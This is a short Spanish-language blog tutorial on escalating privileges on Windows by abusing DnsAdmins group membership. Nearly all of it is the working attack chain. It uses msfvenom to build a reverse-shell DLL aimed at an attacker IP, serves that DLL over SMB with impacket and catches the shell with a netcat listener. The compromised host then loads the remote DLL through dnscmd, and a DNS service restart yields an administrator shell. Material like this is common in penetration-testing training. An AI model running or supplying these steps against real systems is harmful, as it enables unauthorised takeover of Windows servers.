Escalada de privilegios en Windows mediante grupo Administradores de DNS

Cuando tomamos el control de una máquina, el siguiente paso es la escalada de privilegios para hacernos con el control total de ella. En la siguiente entrada, veremos como conseguirlo aprovechándonos del grupo de administradores DNS y la inyección de una dll maliciosa.

Pasos a seguir

  1. Comprobar que el usuario comprometido forma parte del grupo de administradores DNS.
whoami /all
Comprobación del grupo de administradores DNS
  1. Generar un payload con una shell reversa mediante el uso de msfvenom.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=[IP-ATACANTE] LPORT=[PUERTO-ATACANTE] --platform=windows -f dll > ~/payloads/plugin.dll
Generación de dll maliciosa con msfvenom
  1. Desde la máquina atacante, servir el payload generado en el paso anterior por SAMBA mediante el script smbserver.py.
cd /usr/share/doc/python3-impacket/examples
sudo ./smbserver.py HACKPUNTES /home/jolmedo/payloads/
759c95ae3e2c76f97721ea0ea5ac1512.png
Servicio SAMBA del script smbserver.py
  1. En otra terminal, ponemos la máquina atacante a la escucha en el puerto 4444 con netcat.
nc -lvnp 4444
  1. En la máquina comprometida, importamos la dll maliciosa de la siguiente manera.
dnscmd.exe /config /serverlevelplugindll \\[IP-ATACANTE]\hackpuntes\plugin.dll
Importación de dll maliciosa en equipo comprometido
  1. Ultimo paso para conseguir la shell reversa con privilegios, reiniciar el servicio DNS.
sc.exe stop dns
sc.exe start dns
e7b6d94557fe1e9afc9b660aa89a5abf.png
Shell reversa con permisos de administrador

Hasta la próxima!!

Deja tu comentario

Ir arriba